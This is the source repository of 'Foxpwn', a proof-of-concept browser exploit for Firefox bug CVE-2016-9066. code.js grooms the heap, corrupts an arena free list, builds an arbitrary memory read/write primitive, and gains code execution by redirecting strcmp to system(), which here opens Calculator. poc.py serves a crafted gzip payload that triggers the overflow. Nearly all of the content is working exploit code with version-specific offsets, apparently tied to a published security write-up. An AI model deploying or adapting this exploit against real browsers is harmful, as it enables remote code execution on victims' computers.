├── README.md
├── code.js
├── index.html
├── poc.py
└── server.py


/README.md:
--------------------------------------------------------------------------------
1 | # Foxpwn
2 | 
3 | Proof-of-Concept exploit for CVE-2016-9066. Find a detailed writeup [here](https://saelo.github.io/posts/firefox-script-loader-overflow.html).
4 | 


--------------------------------------------------------------------------------
/code.js:
--------------------------------------------------------------------------------
  1 | //
  2 | // Proof-of-Concept exploit for CVE-???-???
  3 | //
  4 | // Essentially, the bug allows us to overflow a 8GB memory region with more or less controlled data.
  5 | // We use that to corrupt the free list of an Arena (a structure containing JSObject instances)
  6 | // and with that force a newly allocated ArrayBuffer object to be placed inside the inline data
  7 | // of another ArrayBuffer object. This gives us an arbitrary read+write primitive.
  8 | //
  9 | 
 10 | //
 11 | // Utility stuff.
 12 | //
 13 | 
 14 | const KB = 0x400;
 15 | const MB = 0x100000;
 16 | const GB = 0x40000000;
 17 | 
 18 | // Return the hexadecimal representation of the given byte.
 19 | function hex(b) {
 20 |     return ('0' + b.toString(16)).substr(-2);
 21 | }
 22 | 
 23 | // Return the hexadecimal representation of the given byte array.
 24 | function hexlify(bytes) {
 25 |     var res = [];
 26 |     for (var i = 0; i < bytes.length; i++)
 27 |         res.push(hex(bytes[i]));
 28 | 
 29 |     return res.join('');
 30 | }
 31 | 
 32 | // Return the binary data represented by the given hexdecimal string.
 33 | function unhexlify(hexstr) {
 34 |     if (hexstr.length % 2 == 1)
 35 |         throw new TypeError("Invalid hex string");
 36 | 
 37 |     var bytes = new Uint8Array(hexstr.length / 2);
 38 |     for (var i = 0; i < hexstr.length; i += 2)
 39 |         bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
 40 | 
 41 |     return bytes;
 42 | }
 43 | 
 44 | function hexdump(data) {
 45 |     if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
 46 |         data = Array.from(data);
 47 | 
 48 |     var lines = [];
 49 |     for (var i = 0; i < data.length; i += 16) {
 50 |         var chunk = data.slice(i, i+16);
 51 |         var parts = chunk.map(hex);
 52 |         if (parts.length > 8)
 53 |             parts.splice(8, 0, ' ');
 54 |         lines.push(parts.join(' '));
 55 |     }
 56 | 
 57 |     return lines.join('\n');
 58 | }
 59 | 
 60 | function print(msg) {
 61 |     console.log(msg);
 62 |     document.body.innerText += msg + '\n';
 63 | }
 64 | 
 65 | // Tell the server that we have completed our next step and wait
 66 | // for it to completes its next step.
 67 | function synchronize() {
 68 |     var xhr = new XMLHttpRequest();
 69 |     xhr.open('GET', location.origin + '/sync', false);
 70 |     // Server will block until the event has been fired
 71 |     xhr.send();
 72 | }
 73 | 
 74 | //
 75 | // Datatype to represent 64-bit integers.
 76 | //
 77 | // Internally, the integer is stored as a Uint8Array in little endian byte order.
 78 | function Int64(v) {
 79 |     // The underlying byte array.
 80 |     var bytes = new Uint8Array(8);
 81 | 
 82 |     switch (typeof v) {
 83 |         case 'number':
 84 |             v = '0x' + Math.floor(v).toString(16);
 85 |         case 'string':
 86 |             if (v.startsWith('0x'))
 87 |                 v = v.substr(2);
 88 |             if (v.length % 2 == 1)
 89 |                 v = '0' + v;
 90 | 
 91 |             var bigEndian = unhexlify(v, 8);
 92 |             bytes.set(Array.from(bigEndian).reverse());
 93 |             break;
 94 |         case 'object':
 95 |             if (v instanceof Int64) {
 96 |                 bytes.set(v.bytes());
 97 |             } else {
 98 |                 if (v.length != 8)
 99 |                     throw TypeError("Array must have excactly 8 elements.");
100 |                 bytes.set(v);
101 |             }
102 |             break;
103 |         case 'undefined':
104 |             break;
105 |         default:
106 |             throw TypeError("Int64 constructor requires an argument.");
107 |     }
108 | 
109 |     // Return the underlying bytes of this number as array.
110 |     this.bytes = function() {
111 |         return Array.from(bytes);
112 |     };
113 | 
114 |     // Return the byte at the given index.
115 |     this.byteAt = function(i) {
116 |         return bytes[i];
117 |     };
118 | 
119 |     // Return the value of this number as unsigned hex string.
120 |     this.toString = function() {
121 |         return '0x' + hexlify(Array.from(bytes).reverse());
122 |     };
123 | 
124 |     // Basic arithmetic.
125 |     // These functions assign the result of the computation to their 'this' object.
126 | 
127 |     // Decorator for Int64 instance operations. Takes care
128 |     // of converting arguments to Int64 instances if required.
129 |     function operation(f, nargs) {
130 |         return function() {
131 |             if (arguments.length != nargs)
132 |                 throw Error("Not enough arguments for function " + f.name);
133 |             for (var i = 0; i < arguments.length; i++)
134 |                 if (!(arguments[i] instanceof Int64))
135 |                     arguments[i] = new Int64(arguments[i]);
136 |             return f.apply(this, arguments);
137 |         };
138 |     }
139 | 
140 |     // this == other
141 |     this.equals = operation(function(other) {
142 |         for (var i = 0; i < 8; i++) {
143 |             if (this.byteAt(i) != other.byteAt(i))
144 |                 return false;
145 |         }
146 |         return true;
147 |     }, 1);
148 | 
149 |     // this = -n (two's complement)
150 |     this.assignNeg = operation(function neg(n) {
151 |         for (var i = 0; i < 8; i++)
152 |             bytes[i] = ~n.byteAt(i);
153 | 
154 |         return this.assignAdd(this, Int64.One);
155 |     }, 1);
156 | 
157 |     // this = a + b
158 |     this.assignAdd = operation(function add(a, b) {
159 |         var carry = 0;
160 |         for (var i = 0; i < 8; i++) {
161 |             var cur = a.byteAt(i) + b.byteAt(i) + carry;
162 |             carry = cur > 0xff | 0;
163 |             bytes[i] = cur;
164 |         }
165 |         return this;
166 |     }, 2);
167 | 
168 |     // this = a - b
169 |     this.assignSub = operation(function sub(a, b) {
170 |         var carry = 0;
171 |         for (var i = 0; i < 8; i++) {
172 |             var cur = a.byteAt(i) - b.byteAt(i) - carry;
173 |             carry = cur < 0 | 0;
174 |             bytes[i] = cur;
175 |         }
176 |         return this;
177 |     }, 2);
178 | 
179 |     // this = a << 1
180 |     this.assignLShift1 = operation(function lshift1(a) {
181 |         var highBit = 0;
182 |         for (var i = 0; i < 8; i++) {
183 |             var cur = a.byteAt(i);
184 |             bytes[i] = (cur << 1) | highBit;
185 |             highBit = (cur & 0x80) >> 7;
186 |         }
187 |         return this;
188 |     }, 1);
189 | 
190 |     // this = a >> 1
191 |     this.assignRShift1 = operation(function rshift1(a) {
192 |         var lowBit = 0;
193 |         for (var i = 7; i >= 0; i--) {
194 |             var cur = a.byteAt(i);
195 |             bytes[i] = (cur >> 1) | lowBit;
196 |             lowBit = (cur & 0x1) << 7;
197 |         }
198 |         return this;
199 |     }, 1);
200 | 
201 |     // this = a & b
202 |     this.assignAnd = operation(function and(a, b) {
203 |         for (var i = 0; i < 8; i++) {
204 |             bytes[i] = a.byteAt(i) & b.byteAt(i);
205 |         }
206 |         return this;
207 |     }, 2);
208 | }
209 | 
210 | // Constructs a new Int64 instance with the same bit representation as the provided double.
211 | Int64.fromJSValue = function(bytes) {
212 |     bytes[7] = 0;
213 |     bytes[6] = 0;
214 |     return new Int64(bytes);
215 | };
216 | 
217 | // Convenience functions. These allocate a new Int64 to hold the result.
218 | 
219 | // Return ~n (two's complement)
220 | function Neg(n) {
221 |     return (new Int64()).assignNeg(n);
222 | }
223 | 
224 | // Return a + b
225 | function Add(a, b) {
226 |     return (new Int64()).assignAdd(a, b);
227 | }
228 | 
229 | // Return a - b
230 | function Sub(a, b) {
231 |     return (new Int64()).assignSub(a, b);
232 | }
233 | 
234 | function LShift1(a) {
235 |     return (new Int64()).assignLShift1(a);
236 | }
237 | 
238 | function RShift1(a) {
239 |     return (new Int64()).assignRShift1(a);
240 | }
241 | 
242 | function And(a, b) {
243 |     return (new Int64()).assignAnd(a, b);
244 | }
245 | 
246 | function Equals(a, b) {
247 |     return a.equals(b);
248 | }
249 | 
250 | // Some commonly used numbers.
251 | Int64.Zero = new Int64(0);
252 | Int64.One = new Int64(1);
253 | 
254 | //
255 | // Main exploit logic.
256 | //
257 | //     0. Insert a <script> tag to load the payload and eventually trigger the bug.
258 | //
259 | //     1. Wait for the server to send up to 2GB + 1 bytes of data and fill up
260 | //        the chunks freed by realloc() in between.
261 | //        The browser will now have allocated the final (8GB) chunk that we will
262 | //        later overflow from.
263 | //
264 | //     2. Allocate JavaScript arenas (memory regions) containing ArrayBuffers of size 12*8
265 | //        (largest size so the data is still allocated inline behind the object) and hope
266 | //        one of them is placed right after the buffer we are about to overflow.
267 | //        mmap allocates contiguous regions (on macOS at least), so this can only fail if
268 | //        we don't allocate enough memory or if something is allocated in between.
269 | //
270 | //     3. Tell the server to send 0xffffffff bytes in total, completely filling
271 | //        the current chunk
272 | //
273 | //     4. Free one ArrayBuffer in every arena and try to trigger gargabe collection
274 | //        so the arenas are inserted into the free list.
275 | //
276 | //     5. Tell the server to send the remaining data which will trigger the overflow
277 | //        and corrupt the internal free list (indicating which slots are unused) of
278 | //        one of the arenas.
279 | //
280 | //     6. Allocate more ArrayBuffers. If everything worked so far, one of them will be
281 | //        allocated inside the inline data of another ArrayBuffer. Search for that
282 | //        ArrayBuffer.
283 | //
284 | //     7. If found, construct an arbitrary memory read/write primitive. We can
285 | //        now write the data pointer of the inner ArrayBuffer, so this is quite easy.
286 | //
287 | //     8. Repair some things to keep the process alive after our exploit is finished.
288 | //
289 | //     9. Use the memory read/write to gain code execution.
290 | //
291 | //
292 | 
293 | // Force a GC.
294 | // We must trigger a full GC without triggering a compacting GC,
295 | // as that might fill the holes again...
296 | // Triggering the TOO_MUCH_MALLOC condition seems to do the trick.
297 | function gc() {
298 |     const maxMallocBytes = 128 * MB;
299 |     for (var i = 0; i < 3; i++) {
300 |         var x = new ArrayBuffer(maxMallocBytes);
301 |     }
302 | }
303 | 
304 | function pwn() {
305 |     // Step 0
306 |     var script = document.createElement('script');
307 |     script.src = location.origin + '/payload.js';
308 |     document.head.appendChild(script);
309 | 
310 |     // Step 1
311 |     // The server sends a sync reply once it has sent |2**x| + 1 bytes. At that point the browser
312 |     // will do a realloc, doubling the chunksize and freeing the old chunk. We now try to take the
313 |     // freed chunk with an ArrayBuffer.
314 |     var fillBuffers = [];
315 |     for (var sz = 1 * MB; sz <= 4 * GB; sz *= 2) {
316 |         // Wait for the server to send |sz| + 1 bytes
317 |         synchronize();
318 |         if (sz > 1 * GB) {
319 |             for (var i = 0; i < sz / (1 * GB); i++) {
320 |                 // Make the buffers slightly smaller to compensate for any
321 |                 // other allocations that might happen in between.
322 |                 fillBuffers.push(new Uint8Array(1 * GB - 16 * MB));
323 |             }
324 |         } else {
325 |             fillBuffers.push(new Uint8Array(sz));
326 |         }
327 |         print("Filling free chunk of size " + (sz / (1 * MB)) + " MB");
328 |     }
329 | 
330 |     // Step 2
331 |     // Allocate a large number of ArrayBuffers and hope one of the hosting Arenas/Chunks
332 |     // is placed behind the buffer that will be overflown.
333 |     var buffers = new Array(2000000);
334 |     print("Allocating ArrayBuffers and new arenas...");
335 |     for (var i = 0; i < buffers.length; i++) {
336 |         buffers[i] = new ArrayBuffer(12 * 8);
337 |     }
338 | 
339 |     // Step 3
340 |     synchronize();
341 | 
342 |     // Step 4
343 |     // There are 25 ArrayBuffers per Arena, so free one per arena.
344 |     print("ArrayBuffers allocated, making holes and triggering a garbage collection run...");
345 |     for (var i = 5; i < buffers.length; i += 25) {
346 |         buffers[i] = null;
347 |     }
348 |     gc();
349 | 
350 |     // Step 5
351 |     print("Done. Waiting for Server now...");
352 |     synchronize();
353 | 
354 |     //
355 |     // Step 6
356 |     //
357 |     // At this point we've (hopefully) corrupted the free list of an arena and have thus created a fake free
358 |     // cell inside the inline data of an ArrayBuffer.
359 |     //
360 |     // Helper function to allocate an ArrayBuffer and tag it with its index
361 |     // so we can later locate it in the newBuffers array.
362 |     function allocateTaggedBuffer(i) {
363 |         var ab = new ArrayBuffer(12 * 8);
364 |         var view = new Uint32Array(ab);
365 |         view[0] = i;
366 |         return ab;
367 |     }
368 | 
369 |     // Allocate new ArrayBuffers to fill the holes.
370 |     // We allocate some more since there might be (partially) empty arenas left over.
371 |     var numNewBuffers = (buffers.length / 25) * 2;
372 |     var newBuffers = new Array(numNewBuffers);
373 |     for (var i = 0; i < numNewBuffers; i++) {
374 |         newBuffers[i] = allocateTaggedBuffer(i);
375 |     }
376 | 
377 |     // Now see if we can find one of the newly allocated ArrayBuffers inside one of the
378 |     // previously allocated buffers. |outer| will be the original ArrayBuffer and |inner|
379 |     // will be the ArrayBuffer that has been placed inside |outer|'s inline data.
380 |     print("Looking for buffer...");
381 | 
382 |     var outer = null;
383 |     var id = -1;
384 |     for (var i = 0; i < buffers.length; i++) {
385 |         if (!buffers[i])
386 |             continue
387 | 
388 |         outer = new Uint32Array(buffers[i]);
389 |         if (outer[16] != 0) {
390 |             id = outer[16];
391 |             print("Found! ID = " + id);
392 |             outer = outer.buffer;
393 |             break;
394 |         }
395 |     }
396 |     if (id == -1) {
397 |         print("Failed. Dumping fill buffers and exiting...");
398 |         // If we've hit a fill buffer, we need to allocate less of them...
399 |         for (var i = 0; i < fillBuffers.length; i++) {
400 |             print(fillBuffers[i].slice(0, 100).join(' '));
401 |         }
402 |         return;
403 |     }
404 | 
405 |     // Step 7
406 |     var inner = newBuffers[id];
407 |     var outerByteView = new Uint8Array(outer);
408 |     var innerByteView = new Uint8Array(inner);
409 | 
410 |     // Determine address of |inner| by reading its data pointer, which points to |inner| + 64
411 |     // since the data is stored inline.
412 |     // The left shift is required because "private" JSValues are stored right-shifted by one bit.
413 |     var addressOfInnerArrayBuffer = Sub(LShift1(new Int64(outerByteView.slice(32, 40)), 1), 64);
414 |     print("Address of inner ArrayBuffer: " + addressOfInnerArrayBuffer.toString());
415 | 
416 |     // Increase length of |inner|.
417 |     outerByteView[43] = 0x1;
418 |     print("Length of inner ArrayBuffer: " + inner.byteLength);
419 | 
420 |     // Object to access the process' memory. Very useful.
421 |     var memory = {
422 |         write: function(addr, data) {
423 |             // Set data pointer of |inner|
424 |             outerByteView.set(RShift1(addr).bytes(), 32);
425 |             // Uint8Array's cache the data pointer of the underlying ArrayBuffer
426 |             var innerView = new Uint8Array(inner);
427 |             innerView.set(data);
428 |         },
429 |         read: function(addr, length) {
430 |             // Set data pointer of |inner|
431 |             outerByteView.set(RShift1(addr).bytes(), 32);
432 |             // Uint8Array's cache the data pointer of the underlying ArrayBuffer
433 |             var innerView = new Uint8Array(inner);
434 |             return innerView.slice(0, length);
435 |         },
436 |         readPointer: function(addr) {
437 |             return new Int64(this.read(addr, 8));
438 |         },
439 |         addrof: function(obj) {
440 |             // To leak the address of |obj|, we set it as property of the |inner|
441 |             // ArrayBuffer, then leak that using the existing read() method.
442 |             inner.leakMe = obj;
443 |             var addressOfSlotsArray = this.readPointer(Add(addressOfInnerArrayBuffer, 2*8));
444 |             return Int64.fromJSValue(this.read(addressOfSlotsArray, 8));
445 |         },
446 |     };
447 | 
448 |     // Step 8
449 |     // Fix following object
450 |     var nextObjectView = new Uint8Array(inner, 32);
451 |     var objectHeader = outerByteView.slice(0, 64);
452 |     nextObjectView.set(objectHeader);
453 |     print("Following Object repaired.");
454 | 
455 |     // We also need to repair the current arena (so that the free list contains
456 |     // the real free chunk), or else we'll crash during the next GC.
457 |     print("Repairing Arena...");
458 |     var addressOfArena = And(addressOfInnerArrayBuffer, Neg(0x1000));
459 |     var groupPointer = memory.readPointer(addressOfInnerArrayBuffer);
460 |     print("Arena @ " + addressOfArena.toString());
461 |     var addressOfCurrentCell = Add(addressOfArena, 0x60);
462 |     for (var i = 0; i < 25; i++) {
463 |         if (!Equals(memory.readPointer(addressOfCurrentCell), groupPointer)) {
464 |             var offset = i * 160 + 0x60;
465 |             print("Free chunk found @ " + addressOfCurrentCell.toString() + " (offset " + offset + ")");
466 |             var offsetAsBytes = new Uint8Array((new Uint16Array([offset])).buffer);
467 |             memory.write(addressOfArena, offsetAsBytes);
468 |             memory.write(Add(addressOfArena, 2), offsetAsBytes);
469 |         }
470 |         addressOfCurrentCell = Add(addressOfCurrentCell, 160);
471 |     }
472 | 
473 |     // Step 9
474 |     //
475 |     // This is super hackish: we replace strcmp() with system(), then call
476 |     // date.toLocaleFormat, which at some point does a strcmp with
477 |     // the first argument...
478 | 
479 |     // Version dependent offsets. We could get around hardcoding these by making
480 |     // use of our memory read primitive. Left as an excercise for the reader.
481 |     // LibC from OS X 10.11.6
482 |     var strcmpToSystem = 0x8b5760b;
483 | 
484 |     // Firefox 48.0.1 for OS X El Capitan.
485 |     var strcmpOffset = 0x41ad420;
486 |     var maxFuncOffset = 0x2e5ab00;
487 | 
488 |     // Read the native function pointer of Math.max (Any native function would do)
489 |     // and calculate the base address of XUL from that.
490 |     var moduleBase = memory.readPointer(Add(memory.addrof(Math.max), 40));
491 |     var moduleBase = Sub(moduleBase, maxFuncOffset);
492 |     print("XUL Base address: " + moduleBase.toString());
493 | 
494 |     var addressOfStrcmpPointer = Add(moduleBase, strcmpOffset);
495 | 
496 |     var addressOfStrcmp = memory.readPointer(addressOfStrcmpPointer);
497 |     print("strcmp @ " + addressOfStrcmp.toString());
498 | 
499 |     var addressOfSystem = Add(addressOfStrcmp, strcmpToSystem);
500 |     print("system @ " + addressOfSystem.toString());
501 | 
502 |     var trigger = new Date();
503 |     //memory.write(addressOfStrcmpPointer, addressOfSystem.bytes());
504 |     trigger.toLocaleFormat("open -a /Applications/Calculator.app");
505 |     //memory.write(addressOfStrcmpPointer, addressOfStrcmp.bytes());
506 | 
507 |     print("Done.");
508 | }
509 | 
510 | pwn();
511 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <title>foxpwn</title>
 5 |         <style>
 6 |             body {
 7 |                 font-family: monospace;
 8 |             }
 9 |         </style>
10 |         <script src="code.js" async></script>
11 |     </head>
12 |     <body>
13 |         Pwning, please wait...<br />
14 |     </body>
15 | </html>
16 | 


--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | #
  3 | # Implements the server-side logic of the exloit.
  4 | #
  5 | # Copyright (c) 2016 Samuel Groß
  6 | #
  7 | 
  8 | import asyncio
  9 | import zlib
 10 | import os.path
 11 | 
 12 | from server import *
 13 | 
 14 | HOST = '127.0.0.1'
 15 | HOST = '0.0.0.0'
 16 | PORT = 8000
 17 | LOOP = asyncio.get_event_loop()
 18 | 
 19 | server_done_event = asyncio.Event(loop=LOOP)
 20 | script_ready_event = asyncio.Event(loop=LOOP)
 21 | 
 22 | 
 23 | KB = 1024
 24 | MB = 1024 * KB
 25 | GB = 1024 * MB
 26 | 
 27 | # Created by construct_payload()
 28 | payload_parts = []
 29 | 
 30 | def construct_payload():
 31 |     """Generates the compressed payload.
 32 | 
 33 |     This function generates multiple parts of the payload. Concatenating these parts and decompressing
 34 |     the result will yield a 4GB + len(overflow_data) chunk.
 35 |     The parts are generated such that sending one chunk will trigger a realloc() in the browser.
 36 |     The last part contains the final byte of the 4GB chunk and the overflow_data.
 37 |     """
 38 |     compressor = zlib.compressobj(level=1, wbits=31)         # include gzip header + trailer
 39 |     parts = []
 40 | 
 41 |     def add_part(size):
 42 |         payload = bytearray()
 43 |         payload += compressor.compress(bytearray(size))
 44 |         payload += compressor.flush(zlib.Z_FULL_FLUSH)
 45 |         parts.append(payload)
 46 |         return size
 47 | 
 48 |     # Send (total sizes): 1 MB + 1, 2 MB + 1, 4 MB + 1, ... which are the realloc boundaries.
 49 |     # After every realloc, JavaScript will try to fill the now free chunk.
 50 |     # Do this until we've send 0xffffffff bytes of data, then build the final chunk.
 51 |     total_size = 512 * KB      # Start with 1MB (+ 1), browser stores data as char16_t
 52 |     cur_size = 0
 53 |     final_size = 0xffffffff
 54 |     while cur_size < final_size:
 55 |         cur_size += add_part(total_size + 1 - cur_size)
 56 |         total_size = min(2 * total_size, final_size - 1)
 57 | 
 58 |     # UTF-8 for 0xa0, which is the offset of the inline data of the first ArrayBuffer in an arena. See code.js
 59 |     overflow_data = b'\xc2\xa0' * 2
 60 | 
 61 |     payload = bytearray()
 62 |     payload += compressor.compress(b'\x00' + overflow_data)
 63 |     payload += compressor.flush()
 64 |     parts.append(payload)
 65 | 
 66 |     return parts
 67 | 
 68 | 
 69 | async def serve_payload_js(request, response):
 70 |     # (Optional) wait a short while for the browser to finish initialization
 71 |     await asyncio.sleep(2.5)
 72 | 
 73 |     payload_len = sum(map(len, payload_parts))
 74 | 
 75 |     print("Total size of compressed payload: {} bytes".format(payload_len))
 76 | 
 77 |     assert('gzip' in request.headers.get('Accept-Encoding', ''))
 78 |     response.send_header(200, {
 79 |         'Content-Type': 'application/javascript; charset=utf-8',
 80 |         'Content-Length': str(payload_len),
 81 |         'Content-Encoding': 'gzip'
 82 |     })
 83 | 
 84 |     for i, part in enumerate(payload_parts[:-1]):
 85 |         print("Waiting for JavaScript...")
 86 |         await script_ready_event.wait()
 87 |         script_ready_event.clear()
 88 | 
 89 |         response.write(part)
 90 |         await response.drain()
 91 | 
 92 |         # Give the browser some time to decompress (more or less arbitrary delays)
 93 |         # Could try to improve this by measuring CPU usage in JavaScript or something like that...
 94 |         print("Payload sent, waiting a short while...")
 95 |         await asyncio.sleep(0.5)
 96 |         if i > 10:
 97 |             await asyncio.sleep(2)
 98 | 
 99 |         # Browser will (hopefully) have realloc'ed the current chunk by now. Let JavaScript
100 |         # take the freed chunk now.
101 |         print("Waiting for JavaScript...")
102 |         server_done_event.set()
103 | 
104 |     # Wait for JavaScript to allocate something to overflow into
105 |     await script_ready_event.wait()
106 |     script_ready_event.clear()
107 | 
108 |     # Trigger the overflow
109 |     print("Sending remaining payload data...")
110 |     response.write(payload_parts[-1])
111 |     await response.drain()
112 |     await asyncio.sleep(0.1)
113 | 
114 |     server_done_event.set()
115 | 
116 | async def sync(request, response):
117 |     script_ready_event.set()
118 |     await server_done_event.wait()
119 |     server_done_event.clear()
120 | 
121 |     response.send_header(200, {
122 |         'Content-Type': 'text/plain; charset=utf-8',
123 |         'Content-Length': '2'
124 |     })
125 | 
126 |     response.write(b'OK')
127 |     await response.drain()
128 | 
129 | ROUTES = {
130 |     '/': serve_file('index.html', 'text/html; charset=utf-8'),
131 |     '/payload.js': serve_payload_js,
132 |     '/code.js': serve_file('code.js', 'application/javascript; charset=utf-8'),
133 |     '/sync': sync,
134 | }
135 | 
136 | #
137 | # Main
138 | #
139 | 
140 | def main():
141 |     print("Constructing payload...")
142 |     global payload_parts
143 |     payload_parts = construct_payload()
144 | 
145 |     server = HTTPServer(HOST, PORT, ROUTES, LOOP)
146 |     server.run_forever()
147 | 
148 | if __name__ == '__main__':
149 |     main()
150 | 


--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | #
  3 | # Minimalistic webserver using asyncio.
  4 | #
  5 | # Copyright (c) 2016 Samuel Groß
  6 | #
  7 | 
  8 | import asyncio
  9 | 
 10 | #
 11 | # HTTP Server
 12 | #
 13 | 
 14 | HTTP_PHRASES = {
 15 |     100: "Continue",
 16 |     101: "Switching Protocols",
 17 |     200: "OK",
 18 |     201: "Created",
 19 |     202: "Accepted",
 20 |     203: "Non-Authoritative Information",
 21 |     204: "No Content",
 22 |     205: "Reset Content",
 23 |     206: "Partial Content",
 24 |     300: "Multiple Choices",
 25 |     301: "Moved Permanently",
 26 |     302: "Found",
 27 |     303: "See Other",
 28 |     304: "Not Modified",
 29 |     305: "Use Proxy",
 30 |     307: "Temporary Redirect",
 31 |     400: "Bad Request",
 32 |     401: "Unauthorized",
 33 |     402: "Payment Required",
 34 |     403: "Forbidden",
 35 |     404: "Not Found",
 36 |     405: "Method Not Allowed",
 37 |     406: "Not Acceptable",
 38 |     407: "Proxy Authentication Required",
 39 |     408: "Request Time-out",
 40 |     409: "Conflict",
 41 |     410: "Gone",
 42 |     411: "Length Required",
 43 |     412: "Precondition Failed",
 44 |     413: "Request Entity Too Large",
 45 |     414: "Request-URI Too Large",
 46 |     415: "Unsupported Media Type",
 47 |     416: "Requested range not satisfiable",
 48 |     417: "Expectation Failed",
 49 |     500: "Internal Server Error",
 50 |     501: "Not Implemented",
 51 |     502: "Bad Gateway",
 52 |     503: "Service Unavailable",
 53 |     504: "Gateway Time-out",
 54 |     505: "HTTP Version not supported",
 55 | }
 56 | 
 57 | class HTTPServer:
 58 |     """Minimalistic, stream-based HTTP server."""
 59 |     # TODO add some error handling.. :)
 60 | 
 61 |     class Response:
 62 |         """Represents an outgoing HTTP response."""
 63 |         def __init__(self, writer):
 64 |             self._writer = writer
 65 | 
 66 |         def start_header(self, code):
 67 |             resline = 'HTTP/1.1 {} {}'.format(code, HTTP_PHRASES.get(code, ''))
 68 |             print("  >", resline)
 69 |             self.write(resline + '\r\n')
 70 | 
 71 |         def end_header(self):
 72 |             self.add_header('Connection', 'close')
 73 |             self.write('\r\n')
 74 | 
 75 |         def write(self, data):
 76 |             if type(data) == str:
 77 |                 data = bytes(data, 'ascii')
 78 |             self._writer.write(data)
 79 | 
 80 |         def add_header(self, key, value):
 81 |             assert('\n' not in key + value)
 82 |             print("  > {}: {}".format(key, value))
 83 |             self.write(key + ': ' + value + '\r\n')
 84 | 
 85 |         def send_header(self, code, headers):
 86 |             self.start_header(code)
 87 |             for key, value in headers.items():
 88 |                 self.add_header(key, value)
 89 |             self.end_header()
 90 | 
 91 |         async def drain(self):
 92 |             await self._writer.drain()
 93 | 
 94 |     class Request:
 95 |         """Represents an incoming HTTP request."""
 96 |         def __init__(self, peer, method, path, version, headers, reader):
 97 |             self.peer = peer
 98 |             self.method = method
 99 |             self.path = path
100 |             self.version = version
101 |             self.headers = headers
102 |             self.reader = reader
103 | 
104 |         def __str__(self):
105 |             s = "Request from {}\n".format(self.peer)
106 |             s += "  < {} {} {}\n".format(self.method, self.path, self.version)
107 |             for key, value in self.headers.items():
108 |                 s += "  < {}: {}\n".format(key, value)
109 |             return s
110 | 
111 |     def __init__(self, host, port, routes, loop):
112 |         self._coro = asyncio.start_server(self.handle_client, host, port, loop=loop)
113 |         self._loop = loop
114 |         self._routes = routes
115 | 
116 |     async def send_404(self, request, response):
117 |         response.send_header(404, {
118 |             'Content-Length': '0'
119 |         })
120 | 
121 |     async def receive_header(self, reader, writer):
122 |         header = await reader.readuntil(b'\r\n\r\n')
123 |         headers = header.rstrip().split(b'\r\n')
124 | 
125 |         # Extract request line
126 |         # TODO handle GET parameters etc.
127 |         reqline = headers[0].decode('ascii').rstrip().split(' ')
128 |         method, path, version = reqline
129 | 
130 |         # Extract remaining headers
131 |         headers = dict(line.decode('ascii').split(': ') for line in headers[1:])
132 | 
133 |         peer = writer.get_extra_info('peername')
134 |         return self.Request(peer, method, path, version, headers, reader)
135 | 
136 |     async def handle_client(self, reader, writer):
137 |         response = self.Response(writer)
138 |         request = await self.receive_header(reader, writer)
139 |         print(request)
140 | 
141 |         handler = self._routes.get(request.path, self.send_404)
142 |         await handler(request, response)
143 | 
144 |         await writer.drain()
145 |         writer.close()
146 | 
147 |     def run_forever(self):
148 |         server = self._loop.run_until_complete(self._coro)
149 | 
150 |         # Serve requests until Ctrl+C is pressed
151 |         print("Serving on {}".format(server.sockets[0].getsockname()))
152 |         try:
153 |             self._loop.run_forever()
154 |         except KeyboardInterrupt:
155 |             pass
156 | 
157 |         # Close the server
158 |         server.close()
159 |         self._loop.run_until_complete(server.wait_closed())
160 |         self._loop.close()
161 | 
162 | 
163 | #
164 | # Request handlers
165 | #
166 | 
167 | def serve_file(path, ctype):
168 |     async def coro(request, response):
169 |         with open(path, 'rb') as f:
170 |             content = f.read()
171 | 
172 |         response.send_header(200, {
173 |             'Content-Length':str(len(content)),
174 |             'Content-Type': ctype
175 |         })
176 | 
177 |         response.write(content)
178 | 
179 |     return coro
180 | 


--------------------------------------------------------------------------------